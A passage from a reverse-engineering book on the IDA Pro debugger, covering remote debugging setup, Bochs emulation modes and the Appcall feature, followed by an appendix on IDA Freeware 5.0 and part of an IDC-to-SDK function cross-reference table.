rent working directory.

572 Chapter 26

Input file The full path to the file that was used to create the IDA data-

base. For local debugging sessions, this is a path in the local filesystem.

For a remote debugging session, this is the path on the debugging server.

If you choose not to use a full path, the remote server will search its cur-

rent working directory.

Directory The working directory in which the process should be

launched. For local debugging, this directory must exist in the local

filesystem. For remote debugging, this is a directory on the debugging

server.

Parameters Used to specify any command-line parameters to be passed

to the process when it is started. Note that shell metacharacters (such as

<, >, and |) are not honored here. Any such characters will be passed to

the process as command-line arguments. Thus it is not possible to launch

a process under the debugger and have that process perform any sort of

input or output redirection. For remote debugging sessions, process out-

put is displayed in the console that was used to launch the debugging

server.

Hostname The hostname or IP address of the remote debugging

server. Leave this field blank for local debugging sessions.

Port The TCP port number on which the remote debugging server is

listening.

Password The password expected by the remote debugging server.

Note that the data entered into this field is not masked, making it possi-

ble for the password to be viewed by anyone who can observe your dis-

play. Further, this password is transmitted to the remote server as plain

text, making it observable by anyone who can intercept your network

packets.

At first glance, the Application and Input File fields in Figure 26-1 may

seem to be identical. When the file opened in your IDA database is the same

as the executable file that you wish to run on the remote computer, these

two fields will hold the same value. However, in some cases, you may wish to

debug a library file (such as a DLL) that you are analyzing in an IDA data-

base. It is not possible to debug a library file directly because library files are

not standalone executables. In such cases, you will set the Input File field to

the path of the library file. The Application field must be set to the name of

an application that makes use of the library file that you wish to debug.

The procedures for connecting to a remote gdb server are nearly identi-

cal to the procedures for attaching to a remote IDA debugging server with

two minor exceptions. First, no password is required to connect to a gdb_server,

and second, IDA allows specification of gdb-specific behaviors via the Set spe-

cific options button within the debugger setup dialog. Figure 26-2 shows the

GDB Configuration dialog.

Additional Debugger Features 573

Figure 26-2: GDB Configuration dialog

Of note is the fact that IDA has no way of knowing the architecture of

the computer on which the gdb_server is running and that you are obligated

to specify a processor type (which defaults to Intel x86) and potentially the

endian-ness of that processor. IDA is currently capable of providing a debug-

ging interface for x86, ARM, PowerPC, and MIPS processors.

Attaching to a Remote Process

A number of different scenarios exist if you intend to attach to a running

process on your remote debugging server. First, if you have no database open

in IDA, you may select DebuggerAttach and choose from IDA’s list of avail-

able debuggers. If you choose one of IDA’s remote debuggers, you are pre-

sented with the configuration dialog shown in Figure 26-3.

Figure 26-3: Remote debugger configuration

574 Chapter 26

Once you provide the appropriate connection parameters and click OK,

IDA obtains and displays a process list from the remote debugging server,

allowing you to select and attach to a specific process.

In the second scenario, you might already have a binary open in IDA

and wish to attach to a remote process. In this case you may need to select a

debugger (if none has been previously specified for the open file type) or

switch your debugger type (if a remote debugger is not currently selected).

Once a debugger has been selected, you must provide hostname and pass-

word information for the remote debugger server, as shown in Figure 26-1,

at which point you may attach to a remote process using DebuggerAttach

to Process.

Exception Handling During Remote Debugging

In Chapter 25 we discussed the IDA debugger’s handling of exceptions and

how to modify the debugger’s exception-handling behavior. During remote

debugging sessions, the debugger’s default exception-handling behavior

is dictated by the exceptions.cfg file, which resides on the client machine (the

machine on which you are actually running IDA). This allows you to modify

exceptions.cfg and reload the changes via the Debugger Setup dialog (see Fig-

ure 25-4) without the need to access the remote server.

Using Scripts and Plug-ins During Remote Debugging

During a remote debugging session, it remains possible to utilize scripts and

plug-ins to automate debugging tasks. Any scripts or plug-ins that you choose

to execute will run within IDA on the client machine. IDA will in turn handle

any actions that are required to interact with the remote process, such as set-

ting breakpoints, querying state, modifying memory, or resuming execution.

From the script’s perspective, all behaviors will appear just as if the debug-

ging session was taking place locally. The only thing to remember is to make

sure that your scripts and plug-ins are tailored to the architecture on which

the target process is running and not the architecture on which the IDA cli-

ent is running (unless they happen to be the same). In other words, if you

are running the Windows version of IDA as a client for remote debugging

on Linux, do not expect your Windows debugger-hiding script to do you

any good.

Debugging with Bochs

Bochs is an open source x86 emulation environment. Bochs is capable of

full-system emulation of x86 computer systems and includes emulation for

common I/O devices and a custom BIOS. Bochs provides an emulation-

based alternative to virtualization software such as VMware Workstation. Elias

Bachaalany of the Hex-Rays development team has taken the lead on integrat-

ing Bochs with IDA to provide an emulation-based alternative to traditional

Additional Debugger Features 575

debugging.4 Windows versions of IDA ship with and install a compatible ver-

sion of Bochs, while non-Windows users wishing to make use of Bochs must

make sure that version 2.4.2 or later is installed on their system.

With Bochs installed, IDA offers a Local Bochs debugger choice when-

ever you have an x86 binary open in IDA. The availability of Bochs offers

the opportunity to perform local debugging of Windows applications on

non-Windows systems, because the application will be emulated rather than

executed as a native process. Because it’s an emulator, Bochs configuration

options differ somewhat from those available with more traditional debug-

gers. One of the most important things to understand about Bochs is that it

can operate in three distinct modes: disk image mode, IDB mode, and PE

mode. The choice of mode is made using the Bochs specific debugger con-

figuration dialog shown in Figure 26-4.

Figure 26-4: Bochs debugger options dialog

Each of the available modes offers a drastically different degree of fidel-

ity in terms of the quality and type of emulation being performed.

Bochs IDB Mode

Working from the ground up, IDB is the most basic Bochs mode. In IDB

mode, the only code that Bochs is aware of is the code contained in your

database. Memory regions are mapped into Bochs and populated by copying

bytes from the database. A configurable amount of stack space is provided

based on settings in the Bochs options dialog, and IDA will make its own

decision as to where the stack will be allocated. Emulated execution begins

(meaning the instruction pointer is initially positioned) at the database sym-

bol named ENTRY if one has been defined. If an ENTRY symbol is not present,

IDA tests to see if a range of locations is currently selected in the open data-

base and uses the beginning of the range as the debugger entry point. If

no selection exists, then the current cursor location is taken as the initial

instruction pointer value. When running in IDB mode, keep in mind that

4. See “Designing a minimal operating system to emulate 32/64bits x86 code snippets, shellcode

or malware in Bochs” from Recon 2011 (http://www.recon.cx/).

576 Chapter 26

Bochs has no notion of any operating system support such as shared libraries

or the location of any well-known structures within a typical process address

space. It is equally possible to step through a PE file, an ELF file, a Mach-O

file, or a raw blob of machine code such as an exploit payload as long as

the code makes no reference to anything that might reside outside the data-

base. One way that IDB might be used is for executing a single function in an

effort to understand its behavior without the requirement to craft a complete

process or disk image to do so.

Bochs PE Mode

PE mode offers the opportunity to debug at something approaching the

process level. When PE mode is selected and activated, IDA’s Bochs control

module (an IDA plug-in) takes over and behaves much like the Windows

process loader would if you were actually launching a native Windows pro-

cess. A PE mode process receives process (PEB) and thread (TEB) environ-

ment blocks, along with a stack that mimics those that would be created in

an actual process.

The Bochs plug-in also loads (without executing any code) a number of

common Windows libraries into the emulated process address space in order

to properly handle any library calls made by the process. The exact set of

libraries that Bochs loads on debugger start is configurable and is specified

in <IDADIR>/plugins/bochs/startup.idc. Any library may be loaded as is or may

be designated to be stubbed out. If a library is marked to be stubbed, then the

Bochs plug-in will automatically hook every function exported by that library

and redirect execution to a Bochs interception function (refer to startup.idc

and the IDA help system for more details). This stubbing technique provides

an extensible means for users to define custom behaviors for any library

function. For any library that is stubbed by IDA, it is possible to define a cor-

responding script file in which you may define your custom behaviors. For

any library, foolib.dll for example, the Bochs plug-in scans for a related script

named api_foolib.idc or api_foolib.py within the <IDADIR>/plugins/bochs direc-

tory. IDA ships with <IDADIR>/plugins/bochs/api_kernel32.idc, which provides

a good example of the structure of such a file and the implementation of cus-

tom behaviors for a number of functions.

The ability to hook library functions and define custom implementations

is important in PE mode because there is no operating system layer to perform

all of the heavy lifting needed by the shared libraries. For example, by provid-

ing an alternate, script-based behavior for a function such as VirtualAlloc,

which would fail if it could not communicate with the operating system, it is

possible to convince (to some degree) the emulated process that it is run-

ning as an actual process. The goal when creating such script-based behav-

iors is to provide the emulated process with the responses it would expect to

see if were communicating with the actual library functions, which in turn

were communicating with the actual operating system.

Additional Debugger Features 577

If you use IDA on a non-Windows platform, you may take full advantage

of Bochs PE mode by copying any required libraries (as specified in startup.idc)

from a Windows system onto your IDA system and editing startup.idc to point

at the directory containing all of the copied libraries. The following listing

shows an example of the required changes.

// Define additional DLL path

// (add triple slashes to enable the following lines)

/// path /home/idauser/xp_dlls/=c:\winnt\system32\

When using PE mode, one difference you will note when launching a

process under Bochs is that IDA does not open a warning dialog to remind

you of the danger of launching a potentially malicious process under debug-

ger control. This is because the only process that gets created is the Bochs

emulator process, and all of the code that you are debugging is viewed by the

Bochs emulator as data that happens to represent code for it to emulate. No

native process is ever created from the binary that you are debugging.

Bochs Disk Image Mode

The third mode of operation for the Bochs debugger is called disk image

mode. Aside from IDA’s ability to make use of Bochs, Bochs is a full-blown

x86 system emulator on its own. It is quite possible to create hard drive

images, using the bximage tool supplied with Bochs; install an operating sys-

tem on the disk image, using Bochs and any required installation medium

for the desired operating system; and ultimately use Bochs to run your guest

operating system within an emulated environment.

If your primary goal in using IDA/Bochs is to understand the behavior

of a single process, then disk image mode may not be for you. Isolating and

observing a single process executing within a fully emulated operating system

is not an easy task and requires a detailed understanding of the operating sys-

tem and how it manages processes and memory. Where you may find IDA/

Bochs useful is in analyzing system BIOS and boot code, which can be fol-

lowed relatively easily before the operating system code takes over.

In disk image mode, you have no executable file image to load into IDA.

Instead, IDA ships with a loader that recognizes Bochs configuration (bochsrc)

files.5 A bochsrc file is used to describe the hardware execution environment

when Bochs is used as a full system emulator. IDA’s default bochsrc file is

located at <IDADIR>/cfg/bochsrc.cfg. Among other things, a bochsrc file is used

to specify the locations of the system BIOS, video ROM, and disk image files.

IDA’s bochsrc loader offers minimal loading services, doing nothing more

than reading the first sector of the first disk image file specified in the Bochs

configuration file being loaded and then selecting the Bochs debugger for

use with the new database. The use of IDA/Bochs in a master boot record

development scenario is discussed on the Hex-Rays blog.6

5. See http://bochs.sourceforge.net/doc/docbook/user/bochsrc.html for information on the bochsrc file

format.

6. See http://www.hexblog.com/?p=103.

578 Chapter 26

Appcall

The debugger’s Appcall feature effectively extends the capabilities of IDC or

IDAPython to make any function in the active process callable from a script.

There are an infinite number of uses for such a capability, including mapping

additional memory into the process address space (by calling VirtualAlloc or

similar) and injecting new libraries into the process being debugged (by call-

ing LoadLibrary or by calling functions within the process to perform tasks you

would rather perform manually, such as decoding blocks of data or comput-

ing hash values).

In order to make use of Appcall, the function you wish to invoke must

be loaded in the address space of the process being debugged, and IDA must

know or be informed of the function’s prototype so that parameters may be

marshaled and unmarshaled properly. Any Appcall that you do make will be

made in the context of the current debugger thread after first saving the

thread’s state (essentially all registers associated with the thread). Once the

Appcall completes, IDA restores the thread state, and the debugger is ready

to resume execution as if no Appcall had ever taken place.

Let’s look at an example in which Appcall is used to allocate a 4096-byte

block of memory into the current (Windows) process address space. In this

case, the Windows API function that we wish to invoke is named VirtualAlloc

and its prototype is shown here:

LPVOID WINAPI VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize,

DWORD flAllocationType, DWORD flProtect);

The call that we wish to make using Appcall might look something like

the following if we were to write it in C:

VirtualAlloc(NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

This function call ultimately translates into the following once all of the

constants are resolved:

VirtualAlloc(0, 4096, 0x3000, 4);

Recall that while a Windows process is being debugged, IDA prefixes the

name of every library function with the name of the library to which the func-

tion belongs. Thus, VirtualAlloc will be named kernel32_VirtualAlloc when the

debugger is active, as shown is the following listing:

kernel32.dll:766B2FB6 ; ====== S U B R O U T I N E ========

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 ; Attributes: bp-based frame

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 kernel32_VirtualAlloc proc near

Additional Debugger Features 579

No type information is displayed because IDA’s type libraries know noth-

ing about a function named kernel32_VirtualAlloc. Since Appcall requires

knowledge of a function’s type signature, we must add the information into

the database ourselves using the Set Function Type command. An exact type

signature is not required as long as the signature we specify allows IDA to

properly transfer our parameters to the function we are invoking. In this

case, we supply the following signature:

kernel32.dll:766B2FB6 ; Attributes: bp-based frame

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 ; int __stdcall kernel32_VirtualAlloc(int, int, int, int)

kernel32.dll:766B2FB6 kernel32_VirtualAlloc proc near

At this point we are ready to use Appcall to have more memory allocated

into our process. Using IDC, this is extremely easy because all we need to do

is invoke the function just as if it was an IDC function. Entering the function

call at the IDA command line and using the Message function to display the

results yields the following output:

IDC>Message("%x\n", kernel32_VirtualAlloc(0, 4096, 0x3000, 4));

3c0000

The result in this case is a new 4096-byte block allocated to the process at

address 0x3c0000. In order to make the new memory block show up in IDA,

we must use the DebuggerRefresh memory command or wait for IDA to

perform a refresh in conjunction with other debugger operations.

The syntax for performing an Appcall in Python is slightly different,

making use of the Appcall variable defined in the idaapi module. However,

the requirements to have a named function with an assigned type signature

remain. When performed in Python, the same Appcall to VirtualAlloc would

be done as follows:

Python>Message("%x\n" % Appcall.kernel32_VirtualAlloc(0, 4096, 0x3000, 4))

3d0000

Additional information and examples related to Appcall and its uses may

be found on the Hex-Rays blog.7

Summary

Whether through the efforts of the Hex-Rays development team or through

user contributions, IDA’s debugger is continually evolving. The best place to

keep up with all of these changes is the Hex-Rays blog (http://www.hexblog

.com/), where the Hex-Rays developers frequently preview features that will

appear in upcoming versions of IDA. Keeping up with user-contributed

7. See http://www.hexblog.com/?p=113.

580 Chapter 26

extensions requires a little more effort. Occasionally, interesting IDA exten-

sions are announced in the IDA support forums, but you are just as likely to

see them announced in various reverse engineering forums (such as http://

www.openrce.org/), see them entered into Hex-Rays’s annual plug-in writing

contest, or simply stumble across them while performing an Internet search.

IDA’s debugger is both full featured and extensible. With both local and

remote capabilities, as well as the ability to act as a frontend to a number of

popular debuggers such as gdb and WinDbg, IDA offers a consistent debug-

ging interface across a large number of popular platforms. Given the ability

to script extensions or build compiled debugger plug-ins, the limits of the

debugger’s capabilities are constantly being extended. Among current debug-

gers, IDA’s debugger enjoys perhaps the most active development and bene-

fits from the fact that all of its core developers are themselves accomplished

reverse engineers who share a personal as well as professional interest in mak-

ing the debugger a powerful and useful tool.

JMP

EBP

SUB

USING IDA FREEWARE 5.0

In December 2010, Hex-Rays released a sig-

nificant upgrade to its free version of IDA,

moving from version 4.9 to version 5.0. The

freeware version of IDA is a reduced-capability

application that typically lags behind the latest avail-

able version of IDA by several generations and contains

substantially fewer capabilities than the commercial equivalent of the same

version. Thus, not only does the freeware version lack any features introduced

in more recent versions of IDA, it also contains fewer capabilities than the

commercial version of IDA version 5.0.

The intent of this appendix is to provide an overview of the capabilities

of IDA freeware and point out some of the differences in behavior that you

may expect to encounter between the freeware version and the uses of IDA

described throughout this book (which targets the latest commercial version

of IDA). Before getting started, note that Hex-Rays also makes available a

demo version of the latest commercial version of IDA that is reduced in func-

tionality in many of the same ways as the freeware version, with the additional

hindrance that it is not possible to save your work using a demo version of

582 Appendix A

IDA. Also, the demo version will time out at random intervals, requiring

that you restart it (without saving your work!) if you wish to resume the

demonstration.

Restrictions on IDA Freeware

If you wish to use the freeware version of IDA, you must abide by (and, per-

haps, put up with) the following restrictions and reduced functionality:

zThe freeware version is for noncommercial use only.

zThe freeware version is available only in a Windows GUI version.

zThe freeware version lacks all features introduced in later versions of

IDA, including all SDK and scripting features that were introduced in

versions 5.1 and later.

zOn startup, a help file page touting the virtues of the latest version of

IDA will be displayed. You can disable this feature for subsequent startups.

zThe freeware version ships with substantially fewer plug-ins than the

commercial versions.

zThe freeware version can disassemble only x86 code (it has only one

processor module).

zThe freeware version ships with only eight loader modules that cover

common x86 file types, including PE, ELF, Mach-O, MS-DOS, COFF,

and a.out. Loading files in binary format is also supported.

zThe freeware version includes only a few type libraries common to x86

binaries, including those for GNU, Microsoft, and Borland compilers.

zThe freeware version ships with significantly fewer IDC scripts, and it

ships with no Python scripts because version 5.0 predates the integration

of IDAPython.

zAdd-ons such as the FLAIR tools and the SDK are not included.

zDebugging is enabled only for local Windows processes/binaries. No

remote debugging capability is available.

The look and feel of IDA’s freeware version reflects the look and feel

of all commercial versions. For the features that are present in the freeware

version, the behaviors are similar, if not identical, to the behaviors described

throughout the book regarding the commercial versions of IDA. Thus, IDA

freeware is an excellent way to get acquainted with IDA prior to committing

to a purchase. In noncommercial settings such as academic environments,

IDA freeware offers an outstanding opportunity to learn the basics of dis-

assembly and reverse engineering as long as the restriction to x86 is not a

problem.

Using IDA Freeware 5.0 583

Using IDA Freeware

For basic tasks involving x86 disassembly of common file types, IDA freeware

may offer all the capabilities that you require. In particular, IDA 5.0 was the

first version of IDA to incorporate an integrated, graph-based display mode.

This feature alone represents a substantial upgrade over the previous version

of freeware. It is when you find yourself with a need for some of IDA’s more

advanced features that the freeware version begins to come up short. This is

particularly true regarding the creation of FLIRT signatures and the creation

and use of IDA plug-ins. The FLAIR utilities (see Chapter 12) and the IDA

SDK (see Chapter 16) are available only to registered users of commercial

versions of IDA, making it difficult for freeware users to take advantage of

these capabilities.

If you are interested in FLIRT signatures, note that the freeware version

is capable of processing signatures generated by the 4.9 and later versions of

the FLAIR utilities (if you can get your hands on these utilities or have some-

one generate the signatures for you). The SDK is a somewhat different mat-

ter. Even if you manage to locate a copy of version 5.0 of IDA’s SDK, plug-ins

compiled with an unmodified version of the 5.0 SDK are not compatible with

IDA freeware. This is because the freeware utilizes a completely different

method of exporting functions from the core IDA libraries and so requires

a different set of import libraries than are included in the SDK in order to

link properly. This topic has been discussed for previous freeware versions

(specifically IDA 4.9) in various reverse engineering forums.1 Previous solu-

tions required a modified SDK, which was not easy to come by. At the time of

this writing, there is no known publicly available means of compiling plug-ins

for IDA 5.0 freeware. Therefore, users hoping to try out various well-known

plug-ins (see Chapter 23) may need to contact the authors of those plug-ins

to see if they have any means of producing binary versions of their plug-ins

that are compatible with IDA freeware.

1. Please see http://www.woodmann.com/forum/showthread.php?t=10756.

JMP

EBP

SUB

IDC/SDK CROSS-REFERENCE

The following table serves to map IDC

scripting functions to their SDK implemen-

tation. The intent of this table is to help pro-

grammers familiar with IDC understand how

similar actions are carried out using SDK functions.

The need for such a table arises for two reasons: (1)

IDC function names do not map cleanly to their SDK

counterparts, and (2) in some cases a single IDC function is composed of sev-

eral SDK actions. This table also exposes some of the ways in which the SDK

utilizes netnodes as a means of storing information into an IDA database. Spe-

cifically, the manner in which netnodes are utilized to implement IDC arrays

becomes evident when we review the IDC array-manipulation functions.

The table attempts to keep SDK descriptions brief. In doing so, error-

checking code has been omitted, along with many C++ syntactic elements

(notably braces, {}). Many of the SDK functions return results by copying

data into caller-supplied buffers. These buffers have been left undeclared

for brevity. For consistency, such buffers have been named buf, and their size,

in most cases, is assumed to be 1,024 bytes, which is the value of the IDA 6.1

586 Appendix B

SDK’s MAXSTR constant. Finally, variable declarations have been used only where

their use adds to an understanding of the example. Undeclared variables are

most frequently the IDC function input parameters as named in the corre-

sponding reference pages within IDA’s built-in help system.

Please keep in mind that IDC has evolved substantially over the years. In

its earliest versions, IDC’s primary purpose was to expose some of the more

commonly used functionality of the SDK to script programmers. As features

have been added to the language, new IDC functions have been added whose

sole purpose is to support advanced IDC features, such as objects and excep-

tions. All IDC functions are ultimately supported by SDK functions, and as a

result, in something of a role reversal, new IDC features demanded the addi-

tion of new SDK functionality. The latest versions of the SDK now include a

number of functions designed to provide the low-level implementation of

the IDC object model. In most cases, it is unlikely that users will need to

make use of these functions from within compiled modules. One instance

where you may find the object manipulation functions useful is when you

find yourself developing plug-ins that will extend the IDC language by add-

ing new functions.

IDC Function SDK Implementation

AddAutoStkPnt2 add_auto_stkpnt2(get_func(func_ea), ea, delta);

AddBpt //macro for AddBptEx(ea, 0, BPT_SOFT);

AddBptEx add_bpt(ea, size, bpttype);

AddCodeXref add_cref(From, To, flowtype);

AddConstEx add_const(enum_id, name, value, bmask);

AddEntryPoint add_entry(ordinal, ea, name, makecode);

AddEnum add_enum(idx, name, flag);

AddHotkey add_idc_hotkey(hotkey, idcfunc);

AddSeg segment_t s;

s.startEA = startea;

s.endEA = endEA;

s.sel = setup_selector(base);

s.bitness = use32;

s.align = align;

s.comb = comb;

add_segm_ex(&s, NULL, NULL, ADDSEG_NOSREG);

AddSourceFile add_sourcefile(ea1, ea2, filename);

AddStrucEx add_struc(index, name, is_union);

AddStrucMember typeinfo_t mt;

//calls an internal function to initialize mt using typeid

add_struc_member(get_struc(id), name, offset, flag, &mt, nbytes);

AltOp get_forced_operand(ea, n, buf, sizeof(buf));

return qstrdup(buf);

Analysis //macro for SetCharPrm(INF_AUTO, x)

AnalyzeArea analyze_area(sEA, eEA);

IDC/SDK Cross-Reference 587

Appcall //nargs is the number of arguments following type

//args is idc_value_t[] of args following type

idc_value_t result;

if (type.vtype == VT_LONG && type.num == 0)

appcall(ea, 0, NULL, NULL, nargs, args, &result);

else

idc_value_t tval, fields;

internal_parse_type(&type, &tval, &fields);

appcall(ea, 0, &tval, &fields, nargs, args, &result);

AppendFchunk append_func_tail(get_func(funcea), ea1, ea2);

ApplySig plan_to_apply_idasgn(name);

AskAddr ea_t addr = defval;

askaddr(&addr, "%s", prompt):

return addr;

AskFile return qstrdup(askfile_c(forsave, mask, "%s", prompt));

AskIdent return qstrdup(askident(defval, "%s", prompt));

AskLong sval_t val = defval;

asklong(&val, "%s", prompt):

return val;

AskSeg sel_t seg = defval;

askseg(&sel, "%s", prompt):

return val;

AskSelector return ask_selector(sel);

AskStr return qstrdup(askstr(HIST_CMT, defval, "%s", prompt));

AskYN return askyn_c(defval, "%s", prompt);

AttachProcess return attach_process(pid, event_id);

AutoMark //macro, see AutoMark2

AutoMark2 auto_mark_range(start, end, queuetype);

AutoShow //macro, see SetCharPrm

AutoUnmark //*** undocumented function

autoUnmark(start, end, type);

Batch ::batch = batch;

BeginEA //macro, see GetLongPrm

BeginTypeUpdating return begin_type_updating(utp)

Byte return get_full_byte(ea);

CanExceptionContinue return get_debug_event()->can_cont;

ChangeConfig internal_change_config(line)

CheckBpt check_bpt(ea)

Checkpoint //*** undocumented function

ChooseFunction return choose_func(ea, -1)->startEA;

CleanupAppcall return cleanup_appcall(0) == 0;

CmtIndent //macro, see SetCharPrm

CommentEx get_cmt(ea, repeatable, buf, sizeof(buf));

return qstrdup(buf);

IDC Function SDK Implementation

588 Appendix B

Comments //macro, see SetCharPrm

Compile //macro for CompileEx(file, 1);

CompileEx if (isfile)

CompileEx(input, CPL_DEL_MACROS | CPL_USE_LABELS,

errbuf, sizeof(errbuf));

else

CompileLineEx(input, errbuf, sizeof(errbuf));

CreateArray qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(buf, 0, true);

return (nodeidx_t)n;

DbgByte if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint8_t b;

dbg->read_memory(ea, &b, sizeof(b));

return b;

DbgDword if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint32_t d;

dbg->read_memory(ea, &d, sizeof(d));

return d;

DbgQword if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint64_t q;

dbg->read_memory(ea, &q, sizeof(q));

return q;

DbgRead if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint8_t *buf = (uint8_t*) qalloc(len);

dbg->read_memory(ea, buf, len);

return buf;

DbgWord if (dbg && (dbg->may_disturb() || get_process_state() < 0))

uint16_t w;

dbg->read_memory(ea, &w, sizeof(w));

return w;

DbgWrite if (dbg && (dbg->may_disturb() || get_process_state() < 0))

dbg->write_memory(ea, data, length of data);

DecodeInstruction ua_ana0(ea);

return cmd;

DefineException return define_exception(code, name, desc, flags);

DelArrayElement netnode n(id).supdel(idx, tag);

DelBpt del_bpt(ea);

DelCodeXref del_cref(From, To, undef);

DelConstEx del_const(enum_id, value, serial, bmask);

DelEnum del_enum(enum_id);

DelExtLnA netnode n(ea).supdel(n + 1000);

DelExtLnB netnode n(ea).supdel(n + 2000);

DelFixup del_fixup(ea);

DelFunction del_func(ea);

DelHashElement netnode n(id);

n.hashdel(idx);

DelHiddenArea del_hidden_area (ea);

DelHotkey del_idc_hotkey(hotkey);

DelLineNumber del_source_linnum(ea);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 589

DelSeg del_segm(ea, flags);

DelSelector del_selector(sel);

DelSourceFile del_sourcefile(ea);

DelStkPnt del_stkpnt(get_func(func_ea), ea);

DelStruc del_struc(get_struc(id));

DelStrucMember del_struc_member(get_struc(id), offset);

DelXML del_xml(path);

DeleteAll while (get_segm_qty ())

del_segm(getnseg (0), 0);

FlagsDisable(0, inf.ominEA);

FlagsDisable(inf.omaxEA, 0xFFFFFFFF);

DeleteArray netnode n(id).kill();

Demangle demangle_name(buf, sizeof(buf), name, disable_mask);

return qstrdup(buf);

DetachProcess detach_process();

Dfirst return get_first_dref_from(From);

DfirstB return get_first_dref_to(To);

Dnext return get_next_dref_from(From, current);

DnextB return get_next_dref_to(To, current);

Dword return get_full_long(ea);

EnableBpt enable_bpt(ea, enable);

EnableTracing if (trace_level == 0)

return enable_step_trace(enable);

else if (trace_level == 1)

return enable_insn_trace(enable);

else if (trace_level == 2)

return enable_func_trace(enable);

EndTypeUpdating end_type_updating(utp);

Eval idc_value_t v;

calcexpr(-1, expr, &v, errbuf, sizeof(errbuf));

Exec call_system(command);

ExecIDC char fname[16];

uint32_t fnum = globalCount++; //mutex around globalCount

qsnprintf(fname, sizeof(fname), "___idcexec%d", fnum);

uint32_t len;

len = qsnprintf(NULL, 0, "static %s() {\n%s\n; }", fname, input);

char *func = (char*)qalloc(len);

qsnprintf(func, len, "static %s() {\n%s\n; }", fname, input);

ExecuteLine(func, fname, NULL, 0, NULL, NULL, err, sizeof(err));

globalCount--; //mutex around globalCount

qfree(func);

Exit qexit(code);

ExtLinA netnode n(ea).supset(n + 1000, line);

setFlbits(ea, FF_LINE);

ExtLinB netnode n(ea).supset(n + 2000, line);

setFlbits(ea, FF_LINE);

Fatal error(format, ...);

FindBinary ea_t endea = (flag & SEARCH_DOWN) ? inf.maxEA : inf.minEA;

return find_binary(ea, endea, str, getDefaultRadix(), flag);

IDC Function SDK Implementation

590 Appendix B

FindCode return find_code(ea, flag);

FindData return find_data(ea, flag);

FindExplored return find_defined(ea, flag);

FindFuncEnd func_t f;

find_func_bounds(ea, &f, FIND_FUNC_DEFINE);

return f->endEA;

FindImmediate return find_imm(ea, flag, value);

FindSelector return find_selector(val);

FindText return find_text(ea, y, x, str, flag);

FindUnexplored return find_unknown(ea, flag);

FindVoid return find_void(ea, flag);

FirstFuncFchunk get_func(funcea)->startEA;

FirstSeg return getnseg (0)->startEA;

ForgetException excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

ev->erase(i);

return store_exceptions();

return 0;

GenCallGdl gen_simple_call_chart(outfile, "Building graph", title, flags);

GenFuncGdl func_t *f = get_func(ea1);

gen_flow_graph(outfile, title, f, ea1, ea2, flags);

GenerateFile gen_file(type, file_handle, ea1, ea2, flags);

GetArrayElement netnode n(id);

if (tag == 'A') return n.altval(idx);

else if (tag == 'S')

n.supstr(idx, buf, sizeof(buf));

return qstrdup(buf);

GetArrayId qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(buf);

return (nodeidx_t)n;

GetBmaskCmt get_bmask_cmt(enum_id, bmask, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetBmaskName get_bmask_name(enum_id, bmask, buf, sizeof(buf));

return qstrdup(buf);

GetBptAttr bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return -1;

if (bpattr == BPTATTR_EA) return bpt.ea;

else if (bpattr == BPTATTR_SIZE) return bpt.size;

else if (bpattr ==BPTATTR_TYPE) return bpt.type;

else if (bpattr == BPTATTR_COUNT) return bpt.pass_count;

else if (bpattr == BPTATTR_FLAGS) return bpt.flags;

else if (bpattr == BPTATTR_COND) return qstrdup(bpt.condition);

GetBptEA bpt_t bpt;

return getn_bpt(n, &bpt) ? bpt.ea : -1;

GetBptQty return get_bpt_qty();

GetCharPrm if (offset <= 191)

return *(unsigned char*)(offset + (char*)&inf);

IDC Function SDK Implementation

IDC/SDK Cross-Reference 591

GetColor if (what == CIC_ITEM)

return get_color(ea);

else if (what == CIC_FUNC)

return get_func(ea)->color;

else if (what == CIC_SEGM)

return get_seg(ea)->color;

return 0xFFFFFFFF;

GetConstBmask return get_const_bmask(const_id);

GetConstByName return get_const_by_name(name);

GetConstCmt get_const_cmt(const_id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetConstEnum return get_const_enum(const_id);

GetConstEx return get_const(enum_id, value, serial, bmask);

GetConstName get_const_name(const_id, buf, sizeof(buf));

return qstrdup(buf);

GetConstValue return get_const_value(const_id);

GetCurrentLine tag_remove(get_curline(), buf, sizeof(buf))

return qstrdup(buf);

GetCurrentThreadId return get_current_thread();

GetCustomDataFormat return find_custom_data_format(name);

GetCustomDataType return find_custom_data_type(name);

GetDebuggerEvent return wait_for_next_event(wfne, timeout);

GetDisasm generate_disasm_line(ea, buf, sizeof(buf));

tag_remove(buf, buf, 0);

return qstrdup(buf);

GetEntryName get_entry_name(ordinal, buf, sizeof(buf));

return qstrdup(buf);

GetEntryOrdinal return get_entry_ordinal(index);

GetEntryPoint return get_entry(ordinal);

GetEntryPointQty return get_entry_qty();

GetEnum return get_enum(name);

GetEnumCmt get_enum_cmt(enum_id, repeatable, buf, sizeof(buf));

return qstrdup(buf);

GetEnumFlag return get_enum_flag(enum_id);

GetEnumIdx return get_enum_idx(enum_id);

GetEnumName get_enum_name(enum_id, buf, sizeof(buf));

return qstrdup(buf);

GetEnumQty return get_enum_qty();

GetEnumSize return get_enum_size(enum_id);

GetEnumWidth if (enum_id > 0xff000000)

netnode n(enum_id);

return (n.altval(0xfffffffb) >> 3) & 7;

else

return 0;

GetEventBptHardwareEa return get_debug_event()->bpt.hea;

GetEventEa return get_debug_event()->ea;

GetEventExceptionCode return get_debug_event()->exc.code;

IDC Function SDK Implementation

592 Appendix B

GetEventExceptionEa return get_debug_event()->exc.ea;

GetEventExceptionInfo return qstrdup(get_debug_event()->exc.info);

GetEventExitCode return get_debug_event()->exit_code;

GetEventId return get_debug_event()->eid;

GetEventInfo return qstrdup(get_debug_event()->info);

GetEventModuleBase return get_debug_event()->modinfo.base;

